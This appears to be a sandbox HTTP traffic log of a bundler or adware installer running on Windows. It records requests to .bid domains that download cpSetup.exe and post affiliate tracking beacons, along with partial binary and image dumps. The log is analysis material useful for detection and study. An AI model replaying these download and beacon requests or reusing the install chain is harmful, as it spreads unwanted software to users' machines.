Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: wac.a164.taucdn.net

Connection: Keep-Alive

HTTP/1.1 200 OK

Accept-Ranges: bytes

Content-Type: image/jpeg

Date: Wed, 07 Jun 2017 01:14:54 GMT

Last-Modified: Fri, 02 Jun 2017 23:40:54 GMT

Server: ECS (fcn/404E)

X-Cache: HIT

Content-Length: 93373
......Exif..II*.................Ducky.......W......hXXp://ns.adobe.com
/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> 
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c11
1 79.158325, 2015/09/10-01:10:20        "> <rdf:RDF xmlns:rdf="h
ttp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rd
f:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="
hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.a
dobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:c55f3b41-2f86-bf4
c-8f39-4da01ffb8621" xmpMM:DocumentID="xmp.did:04FB4F5D06FF11E69ACB97C
83A91E73C" xmpMM:InstanceID="xmp.iid:04FB4F5C06FF11E69ACB97C83A91E73C"
 xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)"> <xmpMM:Der
ivedFrom stRef:instanceID="xmp.iid:4173da8b-ebdd-3f4d-b68b-ee3af721f64
7" stRef:documentID="xmp.did:c55f3b41-2f86-bf4c-8f39-4da01ffb8621"/>
; </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xp
acket end="r"?>....Adobe.d.........................................
......................................................................
.................................... .................................
...............................................................!..1A.Q
"..aq..W..2B..#...v..8.....Rr..4t5Uu..w9..b3Ss.$T%6V7.C..e...c.DdE&f..
.....'.....G)........................!1..AQaq...R...2r.S.."..3.45....B
..#sbT..C$.c%...Dt...6E7.............?............P..@(......P..@(....
..P..@(......P..@(......P..@(......P..@(......P..@(......P..@(....
<<< skipped >>>

GET /get.php?ses=gEsz9JGrJC2fqloQnyLiA HTTP/1.0

Host: buddy.bellverse.bid

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*

HTTP/1.1 200 OK

Content-Type: application/octet-stream

Content-Length: 910848

Connection: close

Cache-Control: no-store, no-cache, must-revalidate,post-check=0, pre-check=0

Pragma: no-cache

Expires: Sun, 01 Jan 2014 00:00:00 GMT

Server: Microsoft-IIS/8.5

X-Powered-By: PHP/5.3.28

Access-Control-Allow-Origin: *

Content-Transfer-Encoding: Binary

Content-disposition: attachment; filename="cpSetup.exe"

Date: Wed, 07 Jun 2017 01:13:33 GMT

X-Cache: Miss from cloudfront

Via: 1.1 ec6662ba477736a13086dd664a1145be.cloudfront.net (CloudFront)

X-Amz-Cf-Id: KpCrmzd-AR-goQNJS5OJEIhHtzlE9uPEkPEspRlSzn23UrpEwAJClg==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$..............O...O
...O.'.O...O.'.OY..O.'.O...O...N...O...N...O...N...O...O...O...O...OY.
.N...OY..O...O..{O...OY..N...ORich...O........................PE..L...
Yo6Y.................$...................@....@.......................
...P......r>....@..................................;..(.......XM...
....................(..........................,...........@..........
..@..0............................text....".......$.................. 
..`.rdata.......@.......(..............@..@.data...@ ...P.......*.....
.........@....gfids..d............<..............@..@.tls..........
.......@..............@....rsrc...XM.......N...B..............@..@.rel
oc...T.......V..................@..B..................................
......................................................................
......................................................................
..................................................U..].U..].U..].U..].
U..Q.u...pD........].U..].U..].U..j..$pD......].U..j..(pD......]...`D.
..N..h.2C...v..Y.h.2C...v..Y.h.2C...v..Y.j.j.h.aD...aD..CW..h.2C...v..
Y.VWj......Y..aD.......W..j.V.....aD.tNC..%\..h.2C..qv..Y_^...aD...W..
..aD..mN..h.2C..Ov..Y.h.2C..Cv..Y...bD..KN..h.2C..-v..Y...U..Q.M..E...
.AC.3..M.......A..E...].U......M..E....AC.3..M.......A..E..E..E...E...
.P.E.P.P...YY.E...]...U..Q.M..E....AC.3..M.......A..E..M..H..E...]...U
..Q.M..E....AC.3..M.......A..E....P.E....P.....YY.E...]...U..Q.M..
<<< skipped >>>

POST hXXp://wake.tendencyrhythm.bid/installer.php?affId=2601&instId=2519&ho_trackingid=102fec9aa12d4b58230e6934ddb0c4&trackingId=237110129&cc=UA&untracked=&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3 HTTP/1.1

Host: wake.tendencyrhythm.bid

Connection: close

Accept: */*

User-Agent: InstallCapital

Content-Type: application/x-www-form-urlencoded

Content-Length: 362

cid=5c12d1104cca24294ae7d8d45ce8d028&uac=1&id[]=3970&id[]=3971&id[]=3972&id[]=3973&id[]=3974&id[]=3975&id[]=3954&id[]=3955&id[]=3956&id[]=3957&id[]=3958&id[]=3959&id[]=3960&id[]=3961&id[]=3193&id[]=3704&id[]=3706&id[]=3711&id[]=3712&id[]=3713&id[]=3985&id[]=3986&id[]=3987&id[]=3988&id[]=3989&id[]=3946&id[]=3947&id[]=3948&id[]=3949&id[]=3950&id[]=3951&id[]=3952
HTTP/1.1 200 OK

Content-Type: text/html

Server: Microsoft-IIS/8.5

X-Powered-By: PHP/5.3.28

Date: Wed, 07 Jun 2017 01:13:39 GMT

Connection: close

Content-Length: 41640
$..F%..^.9&;...v.9""U.....6oo*R.D<!.".r..}...;....o..)..PQ.^.%.4.U.
.....$q.!...oTB....mq..3....g.l<b9%4*...>a....r-...U". l...V....
.. .$8"...P...?.....F........0.T..x..l.......Hz.l:2..t.9[B..'.....O.j 
..:Hh...c.._..!........~l|.N?......!9OKdB..z.6.s...~. $`t$..z.F1Z.5...
$9RW...W..W...S..upP......2...}E....t.P..qf......&........BvhC......P.
.....L6...{.h;P..*......4..z.'...Z./~.M.>.(s.....E....6.R.u.hoQ..{T
.....5..........O...T..\f.N.[.x......i.6..]P..K..U..!.O...B`._..._?..B
.x..8.|.M.S. q.k.......D.v......l/..e.G.;..ya.f]H.l.l.6F..I]......M$..
..^....6..|......q......:.IB.U.R'K...[@ .YXc...n.....pn..0.q.....Fd.d.
......?...W..dIjaL..R...)....-....68...mE2..n...H.]...:n.t...Y....4..\
.9.iKO..QOad....@r..E.J,q....n..c_$f<J..|.....22......?......I%J..=
.E.]?..V...........eE..(../2..F1G.ZO.. ..NB...x..Z!o..n@Rj.|.........V
..'..|^.<...@.......~..E. ..t.......l.d.......C.R..B...FiF(G......*
...........n7.........BWG.K|...S..^@.U.......#.t}g.Z.7..y;4..t....T.".
o....W{.f%..)....$..v...c.p.Y.& ..... c......a.s....j:.....#...VH.u...
#......f\..8.....b(...(....:,.I.ks..ov.p$.)....U.k.y4&.onl.qj&0#..%...
]..E..\I.D(W..]O...J..c.;...B..,..Z.m.k.90.*.).._.#._[...?/.4!...Mv}R4
.7t&`.A....)..zV..=..}....|..u..................(.J..` .;..v..i.......
....Y9.!$..../t.;..k.@.}.VL.m....u......E....d.~.CQS.".]..l....P/....t
~.....w...a.......].5L..X.x9....mce.z......`.Q.A...Q.p...xr.g.$..CD.QP
$....4.........kZ./.n....71_.....Z.....b.J..poW*.iC....:...~.....>D
.v.M.Fg..../.b...........7....]..0,..6aQ..7..f....i...:...l#>..
<<< skipped >>>

GET /?affId=1006&appTitle=Installation&s1=201&s2=320779&setupName=cpSetup&appVersion=2.92&instId=11&exe=1 HTTP/1.0

Host: meat.detailrobin.bid

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*

HTTP/1.1 302 Moved Temporarily

Content-Type: text/html

Connection: close

Server: nginx/1.10.1

Date: Wed, 07 Jun 2017 01:14:31 GMT

X-Powered-By: PHP/5.5.38

Location: hXXp://buddy.bellverse.bid/get.php?ses=gEsz9JGrJC2fqloQnyLiA

X-Cache: Miss from cloudfront

Via: 1.1 ec6662ba477736a13086dd664a1145be.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 76ajsYcj8VEOdwfE4EwMsGrpRW4jrorY59PRlQfrfQJKvuRgRmj0qQ==

GET /pr/public/js/functions.js HTTP/1.1

Accept: application/javascript, */*;q=0.8

Referer: hXXp://ic-dc.bundlessafevault.com/pr/3e07b12e-e7d1-11e6-836f-02e33f60d095/typ_1.html

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ic-dc.bundlessafevault.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: application/javascript

Content-Length: 372

Connection: keep-alive

Date: Thu, 22 Sep 2016 19:33:59 GMT

Last-Modified: Tue, 19 Jul 2016 17:01:17 GMT

ETag: "becd784a4a40e178aa0317444d95b372"

Accept-Ranges: bytes

Server: AmazonS3

Age: 9769

X-Cache: Hit from cloudfront

Via: 1.1 bc9bd2c59aa48e2932432099ba36a25b.cloudfront.net (CloudFront)

X-Amz-Cf-Id: EZdBpB0E3TCJ5XG55g2HjZHaR0Xp3hpkiqGb4vU_YQ3do3-WJSc1cA==
// JavaScript Document..function parseSearchRequest(name) {..    name 
= name.replace(/[\[]/, "\\[").replace(/[\]]/, "\\]");..    var regex =
 new RegExp("[\\?&]"   name   "=([^&#]*)"),..        results = regex.e
xec(location.search);..    return results == null ? "" : decodeURIComp
onent(results[1].replace(/\ /g, " "));..}..var subId = parseSearchRequ
est("subId") || "0";HTTP/1.1 200 OK..Content-Type: application/javascr
ipt..Content-Length: 372..Connection: keep-alive..Date: Thu, 22 Sep 20
16 19:33:59 GMT..Last-Modified: Tue, 19 Jul 2016 17:01:17 GMT..ETag: "
becd784a4a40e178aa0317444d95b372"..Accept-Ranges: bytes..Server: Amazo
nS3..Age: 9769..X-Cache: Hit from cloudfront..Via: 1.1 bc9bd2c59aa48e2
932432099ba36a25b.cloudfront.net (CloudFront)..X-Amz-Cf-Id: EZdBpB0E3T
CJ5XG55g2HjZHaR0Xp3hpkiqGb4vU_YQ3do3-WJSc1cA==..// JavaScript Document
..function parseSearchRequest(name) {..    name = name.replace(/[\[]/,
 "\\[").replace(/[\]]/, "\\]");..    var regex = new RegExp("[\\?&]"  
 name   "=([^&#]*)"),..        results = regex.exec(location.search);.
.    return results == null ? "" : decodeURIComponent(results[1].repla
ce(/\ /g, " "));..}..var subId = parseSearchRequest("subId") || "0";..
<<< skipped >>>

GET /impression.gif?b=118203&p=5103&ch=&ad.trans.id=ammxbq72zzmp&ap=&wp=&cps=&c=10001&l=UA&h=8f136e40c877dac2422c2d2be7acf039&t=1496798091061&s=e0edce0204b209db8a0c76b02a2aefea&tz=3.0&sh=902&sw=1916&o= HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://ic-dc.bundlessafevault.com/pr/3e07b12e-e7d1-11e6-836f-02e33f60d095/typ_1.html

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: VVV.1-1ads.com

Connection: Keep-Alive

Cookie: epomUUID=b4aedbf0-4b1e-11e7-bbde-9c8e991fef80; cfc=10001-1496815371060--

HTTP/1.1 200 OK

Server: Apache-Coyote/1.1

Cache-Control: no-cache

Pragma: no-cache

Expires: Thu, 01 Jan 1970 00:00:00 GMT

P3P: CP="CAO PSA OUR"

Set-Cookie: ucv=10001-UA-1496884491409-24--; Domain=.VVV.1-1ads.com; Expires=Thu, 07-Jun-2018 01:14:51 GMT; Path=/

Accept-Ranges: bytes

Content-Type: image/gif

Content-Length: 43

Date: Wed, 07 Jun 2017 01:14:51 GMT

Connection: close
GIF89a.............!.......,...........D..;..

GET /ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCB2EeaQNimqU HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: clients1.google.com

HTTP/1.1 200 OK

Content-Type: application/ocsp-response

Date: Sat, 03 Jun 2017 13:28:29 GMT

Expires: Wed, 07 Jun 2017 13:28:29 GMT

Server: ocsp_responder

Content-Length: 463

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN

Cache-Control: public, max-age=345600

Age: 301597
0..........0..... .....0......0...0......J......h.v....b..Z./..2017060
3012820Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./.
...y...j.....20170603012820Z....20170610012820Z0...*.H................
S....;R.A...!...Z.......%....N.6%........C`..W.2\...o.....h.j.....B...
r..K...v.V......'.~.?...K.....O..2/.6.;.n.%.jS....9..n=.....K.2>v..
b....42#:.....d.fHUG,.<S.@N.n.7.*.>.....$....m.$z..V...VI.......
..h....8...V....~_..<.Pk...............6-....Y..@...HTTP/1.1 200 OK
..Content-Type: application/ocsp-response..Date: Sat, 03 Jun 2017 13:2
8:29 GMT..Expires: Wed, 07 Jun 2017 13:28:29 GMT..Server: ocsp_respond
er..Content-Length: 463..X-XSS-Protection: 1; mode=block..X-Frame-Opti
ons: SAMEORIGIN..Cache-Control: public, max-age=345600..Age: 301597..0
..........0..... .....0......0...0......J......h.v....b..Z./..20170603
012820Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./..
..y...j.....20170603012820Z....20170610012820Z0...*.H................S
....;R.A...!...Z.......%....N.6%........C`..W.2\...o.....h.j.....B...r
..K...v.V......'.~.?...K.....O..2/.6.;.n.%.jS....9..n=.....K.2>v..b
....42#:.....d.fHUG,.<S.@N.n.7.*.>.....$....m.$z..V...VI........
.h....8...V....~_..<.Pk...............6-....Y..@.......
<<< skipped >>>

GET /ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCB4rVb3FyuQ1 HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: clients1.google.com

HTTP/1.1 200 OK

Content-Type: application/ocsp-response

Date: Sat, 03 Jun 2017 13:11:07 GMT

Expires: Wed, 07 Jun 2017 13:11:07 GMT

Server: ocsp_responder

Content-Length: 463

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN

Cache-Control: public, max-age=345600

Age: 302640
0..........0..... .....0......0...0......J......h.v....b..Z./..2017060
3012848Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./.
.. U....5....20170603012848Z....20170610012848Z0...*.H.............. s
 ... .w...m.\?.....w.Sb$... ...H.Z...S.0.K.P9.F....ta.......8.....mnq.
(.g...|.Oh.....(J.....>x......hB..^.......T[.=.s\....*^3Dr.....)...
D.....2]m.B...T\.U..(.W.}....ZZX...4_P.........&]..*..=....x#p.s<..
..n>Y..B.D.o6...D.6{.C...;Q....~...x...N.2..].)P@HTTP/1.1 200 OK..C
ontent-Type: application/ocsp-response..Date: Sat, 03 Jun 2017 13:11:0
7 GMT..Expires: Wed, 07 Jun 2017 13:11:07 GMT..Server: ocsp_responder.
.Content-Length: 463..X-XSS-Protection: 1; mode=block..X-Frame-Options
: SAMEORIGIN..Cache-Control: public, max-age=345600..Age: 302640..0...
.......0..... .....0......0...0......J......h.v....b..Z./..20170603012
848Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./... U
....5....20170603012848Z....20170610012848Z0...*.H.............. s ...
 .w...m.\?.....w.Sb$... ...H.Z...S.0.K.P9.F....ta.......8.....mnq.(.g.
..|.Oh.....(J.....>x......hB..^.......T[.=.s\....*^3Dr.....)...D...
..2]m.B...T\.U..(.W.}....ZZX...4_P.........&]..*..=....x#p.s<....n&
gt;Y..B.D.o6...D.6{.C...;Q....~...x...N.2..].)P@..

POST hXXp://when.legtest.bid/installer.php?affId=2601&instId=2519&ho_trackingid=102fec9aa12d4b58230e6934ddb0c4&trackingId=237110129&cc=UA&untracked=&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3 HTTP/1.1

Host: when.legtest.bid

Connection: close

Accept: */*

User-Agent: InstallCapital

Content-Type: application/x-www-form-urlencoded

Content-Length: 362

cid=5c12d1104cca24294ae7d8d45ce8d028&uac=1&id[]=3970&id[]=3971&id[]=3972&id[]=3973&id[]=3974&id[]=3975&id[]=3954&id[]=3955&id[]=3956&id[]=3957&id[]=3958&id[]=3959&id[]=3960&id[]=3961&id[]=3193&id[]=3704&id[]=3706&id[]=3711&id[]=3712&id[]=3713&id[]=3985&id[]=3986&id[]=3987&id[]=3988&id[]=3989&id[]=3946&id[]=3947&id[]=3948&id[]=3949&id[]=3950&id[]=3951&id[]=3952
HTTP/1.1 403 Forbidden

Server: CloudFront

Date: Wed, 07 Jun 2017 01:14:37 GMT

Content-Type: text/html

Content-Length: 689

Connection: close

X-Cache: Error from cloudfront

Via: 1.1 f66721f299cdd94cb1cfea4adb30fe56.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 9Mp3FRpXV1OXMkP6t14sezX3GDq_ZgmjfflMZdR3D82xQnBjSqRp3g==
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "htt
p://VVV.w3.org/TR/html4/loose.dtd">.<HTML><HEAD><MET
A HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
;.<TITLE>ERROR: The request could not be satisfied</TITLE>
.</HEAD><BODY>.<H1>ERROR</H1>.<H2>The re
quest could not be satisfied.</H2>.<HR noshade size="1px">
.This distribution is not configured to allow the HTTP request method 
that was used for this request. The distribution supports only cachabl
e requests..<BR clear="all">.<HR noshade size="1px">.<P
RE>.Generated by cloudfront (CloudFront).Request ID: 9Mp3FRpXV1OXMk
P6t14sezX3GDq_ZgmjfflMZdR3D82xQnBjSqRp3g==.</PRE>.<ADDRESS>
;.</ADDRESS>.</BODY></HTML>..

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSxtDkXkBa3l3lQEfFgudSiPNvt7gQUAPkqw0GRtsnCuD5V8sCXEROgByACEAEAISWIsPpZp3fvBXtmJ98= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: g.symcd.com

HTTP/1.1 200 OK

Server: nginx/1.10.2

Content-Type: application/ocsp-response

Content-Length: 1390

content-transfer-encoding: binary

Cache-Control: max-age=510692, public, no-transform, must-revalidate

Last-Modified: Mon, 5 Jun 2017 23:02:52 GMT

Expires: Mon, 12 Jun 2017 23:02:52 GMT

Date: Wed, 07 Jun 2017 01:15:06 GMT

Connection: keep-alive
0..j......c0.._.. .....0.....P0..L0......V.T'S...q..."...zr.*..2017060
5230252Z0s0q0I0... ..........9.....yP..`...<.......*.A.....>U...
.... ....!%...Y.w..{f'.....20170605230252Z....20170612230252Z0...*.H..
.............e.YU....]}....P'e....'...?..Z....7r..l...m...}` ^Q..~yC.'
'....,=..k.......%......./%Y>#.e.@l..w..1...K.......c..W. 6{..q.HE(
&....[fl..c....j..?..\...[.2.........L...2....>.. 7..zB.z*o.0.Z.Q.;
.9..c.2......V&[....e."..-.K2......2.?^.94... ...i..c.........g....0..
.0...0..s............ ...y..^..g0...*.H........0B1.0...U....US1.0...U.
...GeoTrust Inc.1.0...U....GeoTrust Global CA0...161208112535Z..171214
112535Z02100...U...'GeoTrust Global CA TGV OCSP Responder 50.."0...*.H
.............0...............S....!....,.t.?....d...M@.._.=.S..,."....
..Gdv._c..D1..N'E.:.....a2.......{/rD. .c.2..P...!.....Xn..}....{{.zI9
.Y....../.....;.......fu..,...B._o..B..g....o........?Y\.?...y.H*..]yi
.....3.......F.6.....Q.........{B..19..Kz...\z...P..._...-!.....'.Ym..
......0..0...U.#..0....z.h.....d..}.}e...N0... .....0......0...U.%..0.
.. .......0...U...........0...U.......0.0"..U....0...0.1.0...U....TGV-
OFF-570...*.H..............md.....yV{......y:5..@l#..5.......o..X....,
r}......i..3..o.e...e5..@..H/Q..;.vd..?.j.m....../hv..A.......g.......
a.....G..\.'*.b..>.....L.Y.To<.@>...&1..9.w.....N*Au.e.....b.
.K...PO47.J.....{.C\....G..0/.a.Eo.`z.<;IA...  #.''.CG..K@7z..7.\_.
.'.]q.f._.WN....
<<< skipped >>>

GET /normal_bg.jpg HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: d2adi7hu49xk5t.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: image/jpeg

Content-Length: 26781

Connection: keep-alive

Date: Tue, 02 May 2017 00:12:33 GMT

Last-Modified: Mon, 13 Jun 2016 11:29:07 GMT

ETag: "b5b0ebe137c0293f816eaac3de2b4e51"

Accept-Ranges: bytes

Server: AmazonS3

Age: 66717

X-Cache: Hit from cloudfront

Via: 1.1 3283735112d0a322451d32ef038129c9.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 6BDHRUqMnctPMKul38xL6X2_rr1PVsmwRBYGgeqEK-HXDXrOKeYfFw==
......Exif..II*.................Ducky.......<.....3hXXp://ns.adobe.
com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?&g
t; <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-
c011 66.146729, 2012/05/03-13:40:03        "> <rdf:RDF xmlns:rdf
="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description
 rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="ht
tp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.
0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop Elements 12.0 W
indows" xmpMM:InstanceID="xmp.iid:889F23E5F49B11E4A1FBA1E3C36AE7EE" xm
pMM:DocumentID="xmp.did:889F23E6F49B11E4A1FBA1E3C36AE7EE"> <xmpM
M:DerivedFrom stRef:instanceID="xmp.iid:889F23E3F49B11E4A1FBA1E3C36AE7
EE" stRef:documentID="xmp.did:889F23E4F49B11E4A1FBA1E3C36AE7EE"/> &
lt;/rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpack
et end="r"?>....Adobe.d............................................
......................................................................
.................................E....................................
................................................!.1AQa...q.....2R..u.7
...."...U..B.....5.b..%4Tte'r.E..#$D......................!1."AQ2.a..B
R.q...b.#3.....r......S......C.............?....j9...n..OK....xr...8..
q.C..o..k.k..L[3...v....z.zqNi(...T..#.mJ..TU.....SYi.U.-[NJ9..e.IU.;.
k.KY...Rm..{.....K...M..D.b...E.;.k.K[..#&.kG.....F..........k~p., ...
.J. .0...K-7.(..m..2q...1.}.V.1l...U........E.....*..5..fi.Oe.{...
<<< skipped >>>

GET /pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/img/icon3-green.png HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ic-dc.deliverydlcenter.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: image/png

Content-Length: 1519

Connection: keep-alive

Date: Sat, 03 Jun 2017 02:45:23 GMT

Last-Modified: Fri, 07 Oct 2016 08:02:51 GMT

ETag: "659184a48243f6ae257bc88d601ac7e1"

Accept-Ranges: bytes

Server: AmazonS3

Age: 80700

X-Cache: Hit from cloudfront

Via: 1.1 b7f7970e9c911e165d4cb9f70deac42a.cloudfront.net (CloudFront)

X-Amz-Cf-Id: Vv1USj9lm15CVHnpdnSfXv-Kz17LzOULMN4P5j2LmIgF98AMTux5rQ==
.PNG........IHDR...>...E......$UF....tEXtSoftware.Adobe ImageReadyq
.e<....IDATx..[.O[u.........(.E....o..............U0...Q`.%...}0..$
..d....%&=<.H.|q.sNZ..R..=7.._/P...Z.....rN.....;..0`.......0`.....
S<q..x.6...8. .....4=A].....Y...L<y~&\".I.G..X.Y,......L\{......
./..s.Id.1L....si6o@.c.4.h...5:8.....!...............j..W.h..UvZ...bC.
B....1..j\YZ..9...9....r0..8......V...\..[.HO.y..`.{w..SQ.[.m..L.V.nli
.....L..`..n&...\.bZ.U.@.q...u.......wJ.~.f......:.......x.i.g.......s
...>4...J...z .^r.z..3....RO<y.wI.).Z..v......^p.u.y"H....W*6Q..
tX."?..w...'...%. .......f.|o....3.s......:.Zz].2.............|.v..U..
..c..z.b....i........>....q.S .....'k3...6.......>D.qY.E........
....................1e1=.Ff)..o..|_..O...z...P6. ... ....?O.S...=.DtU.
.c.-C....SG.%.Y....*.......#.=y.K.quyM.......g.(....\9y.Y..s\v....!...
....>@..d............I..d{.m...!..zFR..........._#rr9.g....ut~....!
..;....-....*w...Hx.E.C]........}.....c.n"..>.".._.ZQ.C.."....q.j".
..... ......._I....S.g.....f...o3..Q...jpf......s.)...1B].SO..3..$N..]
.g(.z......D.......T...C/......u.a}....`. ":m.-m..W.....4..JJ.}...%.U.
T....-.N.....m."..?YE...q=....|P.....X.H,.......|..J.F.#M.......w.t...
Xrr&..e=;.a......R.e.RN...2....n-....g..8d../;....b......p..).&.0Xm.._
.Gs.T..V.y.mo..3....h...F.-.^HH......k....2i...v..&.......j..s,...~ok.
.....=......n.`.x..1.-.I...G..V...F...,U.K...Hb".;p...A/...s.V/.._....
7q.S.|....&.~81v-..../...!.G.Q.m............\./*.$h...>..*.u.@b.ZM~
h1yH..W.E...Wp].a.'{....8r.A,...r.....).hY...?.KE.u.........._...d
<<< skipped >>>

GET /appImg.jpg HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: d2adi7hu49xk5t.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: image/jpeg

Content-Length: 4628

Connection: keep-alive

Date: Tue, 02 May 2017 00:12:33 GMT

Last-Modified: Mon, 13 Jun 2016 11:29:06 GMT

ETag: "ba6c4124ad5d33528fe1d609e6ac1ff0"

Accept-Ranges: bytes

Server: AmazonS3

Age: 66717

X-Cache: Hit from cloudfront

Via: 1.1 300b920cc4a53d2daec2ba8180596d82.cloudfront.net (CloudFront)

X-Amz-Cf-Id: ogz6KAKt4v4NjJghSZ00GkiwZMEOwN2JKO3e0j9PdDtwlPmP8aCHTg==
......Exif..II*.................Ducky.......<.....3hXXp://ns.adobe.
com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?&g
t; <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-
c011 66.146729, 2012/05/03-13:40:03        "> <rdf:RDF xmlns:rdf
="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description
 rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="ht
tp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.
0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop Elements 12.0 W
indows" xmpMM:InstanceID="xmp.iid:E39F75D6F49A11E4B7DAEACD8AA72C6E" xm
pMM:DocumentID="xmp.did:E39F75D7F49A11E4B7DAEACD8AA72C6E"> <xmpM
M:DerivedFrom stRef:instanceID="xmp.iid:E39F75D4F49A11E4B7DAEACD8AA72C
6E" stRef:documentID="xmp.did:E39F75D5F49A11E4B7DAEACD8AA72C6E"/> &
lt;/rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpack
et end="r"?>....Adobe.d............................................
......................................................................
...............................K.G....................................
....................................................!..1AQa.."R.T.q24D
.%...B#dEU'.bSc.5u&C$t.67(.....................!1AQa..."2BR.q...b....r
S.......#............?.<fnfHr.B..v.......ddD.P.Q5.(.(t.....%.KH....
,...@L..f.|?..4G.....[......b.......).4_....=.<.....o.....}....6..3
D....w........u.{..e.(...yN..f..sr......}...G.o......G\...-TBL.<fex
.=.;...u.;..vO6..}.:p...^"x...G.s...k.=....../.t....xg.4O..^..e..z
<<< skipped >>>

GET /pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html HTTP/1.1

Accept: text/html, application/xhtml xml, */*

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ic-dc.deliverydlcenter.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: text/html

Content-Length: 2024

Connection: keep-alive

Date: Sun, 09 Oct 2016 07:51:21 GMT

Last-Modified: Fri, 07 Oct 2016 08:03:05 GMT

ETag: "d9eb4e61c136f58576485da85fc9897d"

Accept-Ranges: bytes

Server: AmazonS3

Age: 18837

X-Cache: Hit from cloudfront

Via: 1.1 3283735112d0a322451d32ef038129c9.cloudfront.net (CloudFront)

X-Amz-Cf-Id: K_X_FuueJsvPA6VE_nse3_BvFNc8AyuoH9v4eE07No-ppkt-siy78A==
